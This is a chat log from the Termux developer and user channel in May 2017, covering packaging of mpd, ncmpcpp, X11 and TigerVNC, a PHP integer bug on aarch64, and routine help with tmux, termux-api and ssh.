2017-05-09 14:50:07 gitter1 (Auxilus) (not wine32 ,it’s wine32)
2017-05-09 14:50:10 gitter1 (Auxilus) 🍷
2017-05-09 15:03:22 gitter1 (vishalbiswas) I think there’s a pull request open for it. @Auxilus
2017-05-09 15:04:16 gitter1 (Auxilus) I’ll Chk
2017-05-09 15:04:16 gitter1 (Auxilus)
2017-05-09 15:06:01 gitter1 (Auxilus) Is package in git ?
2017-05-09 15:06:51 gitter1 (Auxilus) I can’t find actual package
2017-05-09 15:07:05 gitter1 (Auxilus) That pull request is closed
2017-05-09 15:07:05 gitter1 (Auxilus)
2017-05-09 15:14:59 gitter1 (Auxilus) @vishalbiswas I found build.sh
2017-05-09 15:15:10 gitter1 (Auxilus) But not sure how to use it to install
2017-05-09 15:40:33 gitter1 (vishalbiswas) @fornwall Should I add TigerVNC server (including xorg-server) to termux? Will you merge it?
2017-05-09 15:41:22 gitter1 (Auxilus) Is it wine or wine32?
2017-05-09 15:41:28 gitter1 (Auxilus) Cz I want wine32
2017-05-09 15:42:41 gitter1 (vishalbiswas) wine32 just means the 32-bit part of wine, which is the standard wine. So, wine=wine32
2017-05-09 15:43:24 gitter1 (Auxilus) Well where can I find that package ?
2017-05-09 15:44:10 gitter1 (vishalbiswas) ask the author of the pull request to provide a built package
2017-05-09 15:44:43 gitter1 (Auxilus) I have build.sh
2017-05-09 15:44:54 gitter1 (Auxilus) But when I exec it nothing happens
2017-05-09 15:45:12 gitter1 (vishalbiswas) read the readme
2017-05-09 15:45:47 gitter1 (Auxilus) There is no readme in PR
2017-05-09 15:45:47 gitter1 (Auxilus)
2017-05-09 17:47:24 frumpylava would bind be possible?
2017-05-09 18:57:46 live_the_dream i got mpd working..
2017-05-09 20:04:23 live_the_dream well music player daemon on aarch64 …
2017-05-10 01:03:02 live_the_dream s
2017-05-10 01:03:09 u0_a92 z
2017-05-10 03:06:23 live_the_dream ok music player daemon is on my repo …
2017-05-10 03:28:56 u0_a188 Hello, anybody having the device rebooting when trying to change nick in the chat?
2017-05-10 03:39:03 live_the_dream hmmm
2017-05-10 03:39:28 live_the_dream probably same issue as device crashing due to python issue?
2017-05-10 07:07:15 rk Hi
2017-05-10 07:18:55 live_the_dream hello
2017-05-10 08:58:10 alpha0908 Hi
2017-05-10 08:58:54 alpha0908 Is there people?
2017-05-10 08:59:35 alpha0908 Hellow
2017-05-10 08:59:40 JohnOlinda[m] Yep.
2017-05-10 09:02:25 live_the_dream no
2017-05-10 13:59:52 sdrausty cpan Net::HTTP
Result: FAIL
2017-05-10 13:59:52 sdrausty Failed 3/6 test programs. 20/95 subtests failed.
2017-05-10 13:59:52 sdrausty make: *** [Makefile:885: test_dynamic] Error 18
2017-05-10 16:03:18 gitter1 (Cutuchiqueno) @vishalbiswas how do I find out?
2017-05-10 16:29:04 gitter1 (fornwall) @vishalbiswas nice work with tigervnc - make a pull request!
2017-05-10 16:37:41 gitter1 (fornwall) @vishalbiswas I’m a bit hesitant to start adding graphical X11 programs in the main repo, to avoid having to maintain hundreds of gui apps and different versions of gtk and qt. an option would be to create something like termux-gui-packages
, a new repo for X11 programs
2017-05-10 17:38:41 live_the_dream tigervnc?
2017-05-10 17:39:03 live_the_dream is gitter bot not revealing all?
2017-05-10 17:39:55 fornwall live_the_dream: it was down some hours today
2017-05-10 17:40:03 live_the_dream oh
2017-05-10 17:40:24 fornwall live_the_dream: vishalbiswas have x11 and tigervnc up and running, he posted https://goo.gl/Dkx3So to prove it :)
2017-05-10 17:40:27 live_the_dream o btw i got media player daemon to work … it actually plays music on device
2017-05-10 17:40:53 live_the_dream so ncmpcpp can connect to a sound player on device…
2017-05-10 17:41:36 fornwall cool! is that using pulseaudio output from mpd?
2017-05-10 17:41:37 live_the_dream which means its actually more usuable than the terrible ill maintained port that is currently available
2017-05-10 17:41:40 live_the_dream no
2017-05-10 17:41:44 live_the_dream openal directly
2017-05-10 17:41:54 fornwall aha, mpd supports openal?
2017-05-10 17:41:59 live_the_dream yes
2017-05-10 17:42:09 live_the_dream i had to undefine ANDROID
2017-05-10 17:42:15 live_the_dream which is fun
2017-05-10 17:42:37 fornwall hehe :). does it assume that it’s running under a particalur app if ANDROID is defined?
2017-05-10 17:42:46 live_the_dream no
2017-05-10 17:43:00 live_the_dream it works as a normal linux app
2017-05-10 17:43:04 live_the_dream that just uses openal
2017-05-10 17:43:29 live_the_dream we should probably pack ncmpcpp and mpd so ncmpcpp connects via local socket
2017-05-10 17:43:39 live_the_dream in the default config
2017-05-10 17:43:56 live_the_dream then you can add local mp3s to playlist
2017-05-10 17:44:10 fornwall why did ANDROID need to be undefined?
2017-05-10 17:44:19 live_the_dream there is a android port
2017-05-10 17:44:23 live_the_dream that uses java
2017-05-10 17:44:43 live_the_dream so its constantly fails to compile
2017-05-10 17:45:10 live_the_dream opensl using java requires termux-app modifications
2017-05-10 17:45:57 live_the_dream also mpd server uses port 6600 so it needs to be 8600 instead
2017-05-10 17:46:02 live_the_dream on termux
2017-05-10 17:46:38 live_the_dream but it doesn’t even need to use network
2017-05-10 17:46:49 live_the_dream since ncmpcpp can connect via local socket
2017-05-10 17:47:39 live_the_dream and you need local socket connection to add mp3 files that mpd will use
2017-05-10 17:47:44 live_the_dream just the file names
2017-05-10 17:47:46 live_the_dream etc
2017-05-10 17:48:22 live_the_dream mpd has this restriction so open port access anyone can use doesn’t have full file access
2017-05-10 17:48:59 live_the_dream the mpd port currently on playstore doesn’t play local mp3s at all since no local socket access
2017-05-10 17:50:10 fornwall aha. so the “bind_to_address ~/.mpd/socket” in the mpd.conf is what makes it use a local socket?
2017-05-10 17:50:16 live_the_dream yes
2017-05-10 17:50:23 fornwall nice
2017-05-10 17:50:52 live_the_dream i haven’t fully done it yet. I reused the mpv scripts for mpd
2017-05-10 17:51:29 fornwall about the pull request, the “Files changed” tab,
2017-05-10 17:51:31 fornwall https://github.com/termux/termux-packages/pull/1007/files
2017-05-10 17:51:56 fornwall seems to indicate that both disabled-packages/mpd and packages/mpd gets added?
2017-05-10 17:52:11 live_the_dream oh shit i was tired yesterday
2017-05-10 17:52:17 live_the_dream sorry
2017-05-10 17:52:24 live_the_dream have had several sleepless nights
2017-05-10 17:52:42 fornwall no problem, that’s what pull requests are for, to find things
2017-05-10 17:52:54 fornwall sleep problems?
2017-05-10 17:53:00 live_the_dream yes long story
2017-05-10 17:53:39 fornwall sorry to hear, hope it gets better soon!
2017-05-10 17:54:46 live_the_dream the photo stuff i made pull requests for is guys from here https://discuss.pixls.us/t/a-full-android-foss-raw-imageing-pipeline-tutorial/3269
2017-05-10 17:55:19 live_the_dream so there is a userbase for it
2017-05-10 17:55:32 live_the_dream not a large one but i ported stuff for them
2017-05-10 17:57:04 fornwall nice! I’m looking at #982 now
2017-05-10 17:58:15 live_the_dream i wonder if i could get R or octave to display graphics via vnc with vishals stuff
2017-05-10 17:58:46 fornwall I guess TERMUX_PKG_HOMEPAGE for babl should be http://gegl.org/babl/, not http://gmic.eu?
2017-05-10 17:58:56 live_the_dream YEAH
2017-05-10 17:58:59 live_the_dream sorry again
2017-05-10 17:59:23 fornwall no problem! do you want to fix it before merging? otherwise I can update it after
2017-05-10 18:01:53 live_the_dream that would be babl
2017-05-10 18:01:55 live_the_dream that is wrong
2017-05-10 18:02:40 live_the_dream yeah
2017-05-10 18:08:32 live_the_dream rebased mpd commits
2017-05-10 18:10:11 live_the_dream also could add libsoup and imgflo too
2017-05-10 18:10:32 live_the_dream but i don’t know since it laucnhed a httpd and needs browser connection to owrk
2017-05-10 18:10:57 live_the_dream its a tad slow on a mobile ph
2017-05-10 18:11:22 morlog mpd is oming t0 termux?
2017-05-10 18:11:26 live_the_dream yes
2017-05-10 18:11:34 morlog nice
2017-05-10 18:12:02 live_the_dream no volume control though
2017-05-10 18:12:19 live_the_dream no mixer plugin for openal
2017-05-10 18:12:23 morlog hmm
2017-05-10 18:13:02 live_the_dream so ncmpcpp and mpd
2017-05-10 18:13:13 morlog cool
2017-05-10 18:15:45 live_the_dream if mpd is crashing fornwall it might be needed updated openal-soft but i don’t know if its needed because i didn’t check
2017-05-10 18:15:57 live_the_dream tired as fuck
2017-05-10 18:19:02 fornwall I created an issue at openal-soft asking if it’s time for a new release
2017-05-10 18:19:04 fornwall https://github.com/kcat/openal-soft/issues/114
2017-05-10 18:19:26 fornwall as it seems that there are a lot of updates and fixes since the last stable release january last year
2017-05-10 18:20:39 fornwall live_the_dream: for babl, does ‘export THREAD_LIB=”-lc”’ do something, or can it be removed as configure.ac is patched?
2017-05-10 18:20:59 live_the_dream can’t remmeber
2017-05-10 18:21:49 fornwall ok, I’ve merged it now and see if it can be removed
2017-05-10 18:22:12 fornwall you should get some sleep, if possible
2017-05-10 18:33:59 van777 hi. Where is ‘tmux’ config file in termux file system?
2017-05-10 18:34:08 live_the_dream ~/.tmux.conf
2017-05-10 18:34:14 van777 hm
2017-05-10 18:34:28 live_the_dream if it doesn’t exist
2017-05-10 18:34:31 live_the_dream create it
2017-05-10 18:34:33 van777 ah
2017-05-10 18:35:29 van777 but i wanted to to read the key bindings there. i’m new to tmux,
2017-05-10 18:35:45 van777 and the file doesnt exist..
2017-05-10 18:36:29 fornwall van777: try https://tmuxcheatsheet.com/ perhaps
2017-05-10 18:37:57 van777 fornwall: thanks ;) Using screen on the server and tmux on termux.. Gotta learn..
2017-05-10 19:08:18 live_the_dream had a look at gmic yet fornwall?
2017-05-10 19:09:59 live_the_dream 50000 line head file
2017-05-10 19:18:46 live_the_dream i suppose a termux-api command to change volume ?
2017-05-10 19:18:49 live_the_dream would be nice
2017-05-10 19:19:18 fornwall haven’t looked at gmic yet, a 50000 line header file sounds.. interesting :)
2017-05-10 19:20:02 live_the_dream takes a while to compile
2017-05-10 19:20:06 live_the_dream has to be single thread
2017-05-10 19:21:11 fornwall a termux-api command to change volume seems like a good idea!
2017-05-10 19:21:56 fornwall should it take a percentage of max between 0 and 100?
2017-05-10 19:22:12 fornwall perhaps a way to adjust up or down would be useful sometimes
2017-05-10 19:23:00 live_the_dream should go to a max volume of 11 ;)
2017-05-10 19:23:38 live_the_dream percentage sounds good
2017-05-10 19:23:52 fornwall :)
2017-05-10 19:24:56 X_Tu My termux-api suddenly cant use. Who can help me?
2017-05-10 19:34:05 live_the_dream a termux-api command to turn tv on would be interesting
2017-05-10 19:34:14 live_the_dream since i actually have termux running on tv
2017-05-10 19:34:28 X_Tu 👀
2017-05-10 19:51:59 live_the_dream whats the issue X_Tu ?
2017-05-10 19:53:14 X_Tu My api command cant be executed.
2017-05-10 19:54:02 live_the_dream there is no termux-api command in path
2017-05-10 19:54:28 live_the_dream there are termux-* commands that use termux-api
2017-05-10 19:54:34 X_Tu There is. I install both the apk and termux command.
2017-05-10 19:55:02 live_the_dream it is in libexec
2017-05-10 19:55:25 X_Tu They are all here but I cant execute them.
2017-05-10 19:56:05 live_the_dream you need the termux-api apk as well?
2017-05-10 19:56:37 live_the_dream and have the permissions on for termux-api app
2017-05-10 19:56:45 X_Tu I installed it too. And try to reinstall it serveral times.
2017-05-10 19:57:06 X_Tu I dont know if I have permissions….I can use it at passed
2017-05-10 20:00:37 live_the_dream i android settings
2017-05-10 20:00:39 live_the_dream in
2017-05-10 20:00:50 live_the_dream the apps section
2017-05-10 20:01:15 live_the_dream open termux-api see permissions
2017-05-10 20:02:44 X_Tu I give it all permissions that I could give. But i can’t still use termux-api😒
2017-05-10 20:17:40 live_the_dream someobe got cp/m working on termux haha
2017-05-10 20:23:20 live_the_dream i don’t know X_Tu ..
2017-05-10 20:24:52 gitter1 (mklein994) Wow! Thanks live_the_dream for mpd and ncmpcpp! Both work great. I’ll see if I can get --enable-visualizer
working. ‘Cause ya know, why not :P
2017-05-10 20:25:28 X_Tu live_the_dream: well, but still than you.
2017-05-10 20:30:19 gitter1 (mklein994) X_Tu which termux-api command were you trying to run?
2017-05-10 20:33:25 van777 i’m happy listening to my online radio playlist with mpv in a tmux window.. As i understood mpd is to control music player on another device?
2017-05-10 20:33:32 gitter1 (mklein994) X_Tu: does termux-battery-status
work?
2017-05-10 20:33:59 X_Tu No, all apis cant work.
2017-05-10 20:34:03 live_the_dream mpd works on local device
2017-05-10 20:34:57 live_the_dream ncmpcpp is a client for mpd
2017-05-10 20:35:28 live_the_dream the interface ncmpcpp is interesting
2017-05-10 20:36:01 live_the_dream it had play lists lyrics and other stuff
2017-05-10 20:36:20 gitter1 (mklein994) van777: MPD separates the brains (server) from the presentation (client). mpd
runs in the background, and a client like mpc
or a fancier one like ncmpcpp
control what plays. See https://www.musicpd.org.
2017-05-10 20:36:55 live_the_dream so fancy pants console interface
2017-05-10 20:37:15 live_the_dream also running it on my android tv
2017-05-10 20:37:36 live_the_dream mpd also has terrible android support
2017-05-10 20:37:55 live_the_dream most functions don’t work
2017-05-10 20:38:33 gitter1 (mklein994) live_the_dream: how have you organized your code? Did you fork termux-packages?
2017-05-10 20:38:45 gitter1 (mklein994) You mean the app?
2017-05-10 20:38:50 live_the_dream yeah
2017-05-10 20:39:00 gitter1 (mklein994) I’ve tried it. It’s pretty bad.
2017-05-10 20:39:13 gitter1 (mklein994) Where’s your repo located?
2017-05-10 20:39:21 gitter1 (mklein994) The one that holds build.sh
stuff.
2017-05-10 20:39:42 van777 its a pain to install that mpd, i suppose? Now i’m ok with cli mpv, just feeding it my radio urls
2017-05-10 20:39:49 live_the_dream http://github.com/its-pointless/gcc_termux
2017-05-10 20:39:56 X_Tu Do you know proot in termux?
2017-05-10 20:40:07 live_the_dream the pull request
2017-05-10 20:40:17 gitter1 (mklein994) van777: now that mpd is a package, not anymore. ;)
2017-05-10 20:40:21 live_the_dream on termux-packages is me
2017-05-10 20:40:44 live_the_dream but iv got some fortran stuff as well
2017-05-10 20:41:03 gitter1 (mklein994) So if I wanted to see the build script for mpd, where would I look?
2017-05-10 20:41:04 live_the_dream R octave scipy etc
2017-05-10 20:41:48 live_the_dream https://github.com/termux/termux-packages/pull/1007
2017-05-10 20:42:16 live_the_dream or its-pointless/termux-packages and change the branch
2017-05-10 20:42:24 gitter1 (mklein994) cool thanks!
2017-05-10 20:47:07 live_the_dream be warned i was messing about on not a lot of sleep so may have unnecessary stuff
2017-05-10 21:07:09 rods-tab3 https://www.reddit.com/r/linux/comments/66fh4f/what_do_you_use_termux_on_android_for/
2017-05-10 21:07:29 rods-tab3 what program is that?
2017-05-10 21:08:31 live_the_dream htop you mean?
2017-05-10 21:09:45 rods-tab3 the one at top of the reddit
2017-05-10 21:10:55 live_the_dream htop is a program…
2017-05-10 21:15:08 rods-tab3 thanks, got it
2017-05-10 22:37:09 rods-tab3 no color in htop ?
2017-05-10 22:40:30 abff mine has colour
2017-05-10 22:45:54 gitter1 (mklein994) rods-tab3: try rm -rf ~/.config/htop
and try again.
2017-05-10 22:52:05 gitter1 (mklein994) fornwall: I’m interested to know if the recently-added lua support (i.e. has('if_lua')
) to neovim works in termux. No rush; I’m just curious. The python plugin support has had some trouble, so hopefully this works.
2017-05-10 23:41:27 rods-tab3 htop nojoy colours nor colors ??
2017-05-11 00:13:30 gitter1 (vishalbiswas) live_the_dream: I’ll push X11 and TigerVNC to my repo today. You can tinker with it all you want, but, I must warn you that its a huge number of packages.
2017-05-11 00:14:05 live_the_dream i know its why i have been avoiding X11 all this time
2017-05-11 00:14:44 live_the_dream anyway im just fixing linker bugs in gegl
2017-05-11 00:14:56 live_the_dream the plugins aren’t working quite right
2017-05-11 00:30:34 live_the_dream k done
2017-05-11 00:51:03 gitter1 (vishalbiswas) live_the_dream: https://github.com/vishalbiswas/termux-packages/tree/x11 have a go.
2017-05-11 00:51:03 gitter1 (vishalbiswas) I’m currently trying to get xterm working but it fails to spawn a tty. Its a mess of #ifdef
s
2017-05-11 00:51:38 gitter1 (vishalbiswas) don’t try to checkout a particular commit. I haven’t added them in any particular order
2017-05-11 05:55:33 frumpylava That php negative integer bug is annoying.
2017-05-11 05:58:56 frumpylava I tried running php in a chrooted ubuntu and it works there.
2017-05-11 06:05:52 fornwall frumpylava: yes, that is an annoying issue. do you have a chroot installation of a linux distribution for aarch64 available?
2017-05-11 06:06:19 fornwall it would be good to know if this is a general problem for php on 64-bit arm, or particular to the termux build
2017-05-11 06:06:58 frumpylava Well, I have this: https://github.com/Neo-Oli/termux-ubuntu
2017-05-11 06:07:10 frumpylava It sets up a chrooted ubuntu (with proot) on termux
2017-05-11 06:08:07 frumpylava and with this it seems to work.
2017-05-11 06:08:39 frumpylava php -r “var_dump(-1);”
2017-05-11 06:08:44 frumpylava int(-1)
2017-05-11 06:09:04 frumpylava as oposed to float(-1) in normal termux
2017-05-11 06:09:44 fornwall ok, good to know! so it’s not a general php on 64-bit arm issue
2017-05-11 06:10:25 frumpylava fornwall: or at least something that the debian devs patched.
2017-05-11 06:10:39 fornwall ah, right! or version specific - what does ‘php –version’ say?
2017-05-11 06:11:48 frumpylava PHP 7.0.15-1ubuntu4 (cli) (built: Feb 28 2017 21:33:59) ( NTS )
2017-05-11 06:12:24 frumpylava as far as I can tell 7.0.15 has not yet been officialy released on http://php.net
2017-05-11 06:12:39 frumpylava ah sorry I was thinking 7.1.5
2017-05-11 06:14:42 frumpylava So we’re already on 7.1 and debian is still on 7.0
2017-05-11 06:16:07 fornwall hm, debian seems to have php 7.1 available in sid
2017-05-11 06:16:08 fornwall https://packages.debian.org/sid/php7.1
2017-05-11 06:21:42 frumpylava I just upgraded php to the latest stable in ubuntu. The version is now: PHP 7.0.18-0ubuntu0.17.04.1 (cli) (built: Apr 26 2017 23:59:48) ( NTS )
2017-05-11 06:44:05 frumpylava hm.. I can’t get php 7.1 to work on chrooted ubuntu, because it is too unstable. I keep breaking apt.
2017-05-11 09:07:16 live_the_dream that is why rooted linux chroots are better
2017-05-11 09:08:29 live_the_dream also fornwall i was getting bugs with gegl on 5.1 due to link errors so my pull request fixes that …
2017-05-11 09:48:05 frumpylava fornwall: I compiled php 7.0.19 for Termux and it also doesn’t work.
2017-05-11 10:04:21 frumpylava The unreleased version 7.1.5 also doesn’t fix the issue
2017-05-11 14:54:20 Atomic_QlKY6 what’s you favorite command in termux? ive been doing well with the fish shell and alias’
2017-05-11 15:04:01 frumpylava Atomic_QlKY6: I like the profanity messenger
2017-05-11 15:05:51 Atomic_QlKY62 thank man
2017-05-11 15:06:12 Atomic_QlKY62 im goin 2 chk tht out.
2017-05-11 15:06:38 Atomic_QlKY62 do u use it for irc or skype like call?
2017-05-11 15:10:27 frumpylava Atomic_QlKY62: No, you use it for Jabber/xmpp. It’s a really good communications protocol. Thankfully all of my friends use it as well.
2017-05-11 15:10:39 frumpylava If you want irc, try weechat.
2017-05-11 15:26:14 frumpylava fornwall: It’s interessting that gettype(0-1); gives integer while gettype(-1-0) gives double. Also I’ve been searching up and down the php bug reports, but couldn’t find anything remotely similar.
2017-05-11 17:51:04 live_the_dream try compiling php using gcc instead of clang s
2017-05-11 17:52:01 live_the_dream i think that fixes it… unless i haven’t had coffee yet and am halucinating
2017-05-11 17:53:36 live_the_dream seriously took me 15 minutes to solve this bug?
2017-05-11 18:18:53 live_the_dream fornwall: i fixed php bug in 15 minutes
2017-05-11 22:07:51 live_the_dream also software mixer does work on mpd
2017-05-11 22:07:58 live_the_dream i think its good to be added
2017-05-12 00:23:59 frumpylava live_the_dream: Isn’t your solution to everything to just compile it with gcc ? ;)
2017-05-12 00:24:07 live_the_dream yeah
2017-05-12 00:24:31 live_the_dream in future you should probably try it
2017-05-12 00:25:04 live_the_dream btw i got mpd working so we have a fancy new mp3 player
2017-05-12 00:25:10 live_the_dream with play lists
2017-05-12 00:25:29 live_the_dream i think its possible to get opensl as well as openal working too
2017-05-12 00:28:14 frumpylava I’m hesitant of using clang to build packages. I’m dreaming of a future where Termux can compile all it’s own packages. It’s an important step for every distribution to make.
2017-05-12 00:28:51 live_the_dream i see us as more a cygwin without the shitty bits
2017-05-12 00:29:42 live_the_dream 200~Toybox’s main goal is to make Android self-hosting by improving Android’s command line utilities so it can build an installable Android Open Source Project image entirely from source under a stock Android system.
2017-05-12 00:29:48 live_the_dream hmm
2017-05-12 00:30:24 frumpylava live_the_dream: Can I run mpd without needing an external app yet?
2017-05-12 00:30:31 live_the_dream yes
2017-05-12 00:30:34 live_the_dream local deice
2017-05-12 00:30:38 live_the_dream no pulseaudio
2017-05-12 00:30:44 live_the_dream uses openal straight to device
2017-05-12 00:30:47 live_the_dream ncmpcpp also works
2017-05-12 00:30:56 live_the_dream via local socket so you can local mp3s
2017-05-12 00:31:07 live_the_dream add
2017-05-12 00:31:20 live_the_dream to palylists and stuff and do random and get lyrics and last.fm stuff
2017-05-12 00:31:30 live_the_dream all from the console
2017-05-12 00:31:45 live_the_dream its on pull requests
2017-05-12 00:32:15 frumpylava cool.
2017-05-12 00:34:19 frumpylava an interface like alsamixer would be cool. With an android API binding to control androids different streams.
2017-05-12 00:34:41 live_the_dream the mixer in ncmpcpp is working no
2017-05-12 00:34:42 live_the_dream now
2017-05-12 00:37:22 frumpylava cool. looking forward to trying it out.
2017-05-12 00:37:35 frumpylava Do you have a *.deb in your repo?
2017-05-12 00:39:55 live_the_dream yes give
2017-05-12 00:40:11 live_the_dream just in ~/.mpd.conf change mixer from hardware to software
2017-05-12 00:40:16 live_the_dream should work
2017-05-12 00:40:24 live_the_dream ncmpcpp is the client for it you want
2017-05-12 00:50:19 frumpylava live_the_dream: cool. I’ll try it out later. Altough I’m now so used to beets.io I may never switch. I’m hoping I’ll be able to use both, as in use n*****pp with beet play
.
2017-05-12 00:58:43 frumpylava With php working I hope I’ll finally get Typo3 working.
2017-05-12 01:03:54 frumpylava live_the_dream: Will you make a PR for your php fix?
2017-05-12 01:04:09 live_the_dream its one line TERMUX_PKG_CLANG=no
2017-05-12 01:04:17 live_the_dream do i have to ?
2017-05-12 01:11:02 frumpylava live_the_dream: aren’t you motivvated in getting your squares a darker shade of gren? ;)
2017-05-12 01:12:42 live_the_dream not really
2017-05-12 01:12:50 live_the_dream i don’t have my actual name associated with this
2017-05-12 01:17:03 gitter1 (n1had5_twitter) Guys, I know this is kinda a weird questio but, What’s the most basic/simple irc client avaliable in Termux? Weechat is kinda too advanced and i just started looking into irc
2017-05-12 02:00:59 rods-tab3 irssi – afaik only other irc offered by termux
2017-05-12 02:02:57 live_the_dream hmm now have opensles as well as openal sound output for mpd
2017-05-12 02:08:46 live_the_dream no
2017-05-12 02:08:52 live_the_dream not working…
2017-05-12 02:26:18 gitter1 (n1had5_twitter) is irssi simpler than weechat?
2017-05-12 02:28:49 gitter1 (n1had5_twitter) nevermind ill try both ans find out myself
2017-05-12 02:28:55 gitter1 (n1had5_twitter) thanks tho
2017-05-12 02:34:14 frumpylava @n1had5_twitter Irssi is much older than weechat and IMO much less user friendly. I’d still suggest using weechat. It was my first irc client as well (also on termux).
2017-05-12 03:42:01 frumpylava Does gnupg2 also come with a curl helper thing? I can’t seem to import from a keyserver. I always get “gpg: keyserver receive failed: No such file or directory”
2017-05-12 03:43:00 live_the_dream no its seperate
2017-05-12 03:43:19 live_the_dream ?
2017-05-12 03:43:27 live_the_dream i couod be wrong
2017-05-12 03:44:07 frumpylava well gnupg-curl doesn’t seem to work with gnupg2, at least it doesn’t fix my problem
2017-05-12 03:51:41 pvpizza sorry,has anyone had luck compiling and running basic Java programs?
2017-05-12 03:52:16 pvpizza i know that Java and Javac aren’t available
2017-05-12 07:48:38 Regenaxer Hi all!
2017-05-12 07:48:47 Regenaxer Has anyone noticed strange screen updates when using Tmux insite Termux?
2017-05-12 07:48:47 Regenaxer I can have it all the time, eg. with ‘mutt’
2017-05-12 07:48:47 Regenaxer I made a short video https://software-lab.de/Termux-Tmux.mp4
2017-05-12 07:49:15 Regenaxer Is this the fault of Termux, or of Tmux?
2017-05-12 07:49:41 Regenaxer It happens not only in ‘mutt’, also in ‘vim’ or other utils
2017-05-12 07:55:05 Regenaxer In Tmux under Debian I never had such behavior though
2017-05-12 08:46:11 live_the1 hmmm try screen
2017-05-12 08:46:31 live_the1 is the tmux on the sev4r or on termux
2017-05-12 08:55:07 frumpylava Regenaxer: I’ve had weird screen updates like this in mutt and neovim and other tui applications. But I’ve had it happen over SSH to termux as well, so it can’t be a problem of the Terminal Emulator.
2017-05-12 09:12:23 live_the1 l
2017-05-12 09:12:28 live_the1 l
2017-05-12 09:36:45 Regenaxer All runs on Termux in this case
2017-05-12 09:37:27 Regenaxer frumpylava, I see, so you suspect it is mutt’s fault
2017-05-12 09:41:28 Regenaxer I can also reproduce it in tmux running on a remote machine
2017-05-12 09:41:51 Regenaxer ie Termux -> ssh -> tmux -> mutt
2017-05-12 09:43:21 Regenaxer can’t reproduce with vim, so it is indeed mutt
2017-05-12 09:43:40 Regenaxer But mutt stand-alone in an xterm doesn’t show it
2017-05-12 14:41:49 gitter1 (vishalbiswas)
2017-05-12 14:41:51 gitter1 (vishalbiswas) got xterm
working, too
2017-05-12 16:23:19 Skyfaller hey folks, is there a way to change the hosts file in termux? Like could I create one in the custom etc directory?
2017-05-12 16:24:28 Skyfaller I just don’t want to have to type out the IP addresses for each of my servers whenever I ssh to them
2017-05-12 16:27:44 Skyfaller also I’m pretty sure I added my rsa public key to authorized_keys on one host, but I’m still being asked for my password when I ssh in
2017-05-12 16:34:25 Skyfaller I tried ssha but it doesn’t appear as indicated in https://termux.com/ssh.html but it didn’t seem to add my key
2017-05-12 16:35:07 Skyfaller erm, sorry for the word salad there, I meant I tried to use ssha as indicated but it didn’t work
2017-05-12 16:58:28 van777 Skyfaller: I’ve just made myself 2 bash scripts for my 2 servers to connect to. and I’ve renamed each id_rsa to key1.txt and keys. txt. Here is the script example: ssh admin@cat ~/.ssh/ip.txt
-i ~/.ssh/key1.txt
2017-05-12 16:59:18 van777 key2.txt *
2017-05-12 17:15:28 live_the_dream i have a server on a dyn ip but it runs syncthing and i also have rooted ph so i can change it
2017-05-12 17:15:41 live_the_dream the hosts file that is
2017-05-12 17:21:20 van777 live_the_dream: is termux hosts file different of android’s one? Adaway is the first app I install when reinstalling Android. It updates the hosts file..
2017-05-12 17:23:46 live_the_dream no
2017-05-12 17:24:16 live_the_dream but you caan use the same hosts file adaway does
2017-05-12 18:06:55 Skyfaller @van777 thanks for the tip… now how do I run a bash script?
2017-05-12 18:07:21 Skyfaller I created a bash script called “caprice” and put it in my home directory, and tried “./caprice” but it says Permission denied.
2017-05-12 18:07:28 Skyfaller Do I have to be root to run bash scripts???
2017-05-12 18:07:36 van777 no
2017-05-12 18:08:10 van777 bash script.sh
2017-05-12 18:08:16 Skyfaller oh :)
2017-05-12 18:10:23 van777 Skyfaller: Watch some YouTube video tutorials on bash… I like “metalx1000” YouTube channel.
2017-05-12 18:10:55 Skyfaller van777 thank you so much! I got my script working
2017-05-12 18:11:02 van777 =)
2017-05-12 18:19:59 van777 I’ve been advised a software keyboard for Termux, getting used to it now. Seems great. It has Ctrl, Up keys functioning better than on hacker’s keyboard.. It’s MessagEase keyboard
2017-05-12 20:11:12 sdrausty AAWAY /
2017-05-12 22:40:30 John[Lisbeth] How do I apt-get install build essential for arm?
2017-05-12 22:40:39 John[Lisbeth] termux ain’t have no build essential and I need to compile emacs
2017-05-12 22:52:27 rods-tab3 termux: apt install emacs
2017-05-12 22:54:41 John[Lisbeth] that is not what I want to do I want to compile emacs. Are there compilation tools available in termux’ repos?
2017-05-12 22:56:19 gitter1 (vishalbiswas) apt install automake autoconf make pkg-config clang libtool
2017-05-13 09:14:27 Wiezman hola
2017-05-13 09:15:00 Wiezman no one here
2017-05-13 09:21:10 live_the_dream ?
2017-05-13 09:21:15 live_the_dream :(
2017-05-13 10:04:02 MrTijn Sounds like someone who doesn’t really understand IRC…
2017-05-13 12:04:52 van777 i’ve swithed from ssh to mosh. the connection from termux to the weechat server feels smoother now.
2017-05-13 13:07:15 gitter1 (mklein994) live_the_dream: you left log_level "verbose"
in $PREFIX/etc/mpd.conf, and after running mpc update --wait
, the log file ballooned to 1GB. I think it would be best to leave it at " default"
.
2017-05-13 13:08:41 gitter1 (mklein994) Also, wouldn’t it be better to just compile in options like port "8600"
, and leave the rest as defaults commented in the config? I for one like to put everything in ~/.config
instead of cluttering my home directory
2017-05-13 13:08:59 gitter1 (mklein994) s/directory/directory.
2017-05-13 13:15:59 gitter1 (cocodevienne) @mklein994 Sorry I haven’t been able to resolve the issue, I’ve just been extremely busy with School and the end-of-year exams.
2017-05-13 13:16:22 gitter1 (cocodevienne) Why can’t I use the SimpleHTTPServer
module in Python 3.6?
2017-05-13 13:17:23 gitter1 (mklein994) No problem. I completely understand.
2017-05-13 13:19:15 gitter1 (mklein994) @cocodevienne You mean python -m http.server
?
2017-05-13 13:19:51 gitter1 (mklein994) That’s changed from python2 to python3.
2017-05-13 13:22:16 gitter1 (cocodevienne) Ok thanks for being such a sport. The summer holdiays start soon and then I’ll look at it and sort it out. No, I mean SimpleHTTPServer
:)
2017-05-13 13:22:20 gitter1 (cocodevienne) .
2017-05-13 14:46:44 gitter1 (mklein994) First google hit for “python simplehttpserver”:
2017-05-13 14:46:57 gitter1 (mklein994) http://stackoverflow.com/questions/7943751/what-is-the-python-3-equivalent-of-python-m-simplehttpserver
2017-05-13 14:48:00 gitter1 (mklein994) Sorry “python3 simplehttpserver”. :P
2017-05-13 14:48:02 gitter1 (cocodevienne) Oh right thanks! I AM a blind duck!:)
2017-05-13 15:32:50 live_the_dream mklein994 i have mpd working with opensles and openal so its basically fully working
2017-05-13 17:34:59 gitter1 (cocodevienne) Guys, I’ve made a simple and elegant calculator in Ruby. I’ve published it on rubygems.org and reached about ~ 150 downloads already. Does anyone want to help me get that number up?
2017-05-13 17:35:07 gitter1 (cocodevienne) I would be really happy!
2017-05-13 19:14:16 swift110 hey guys
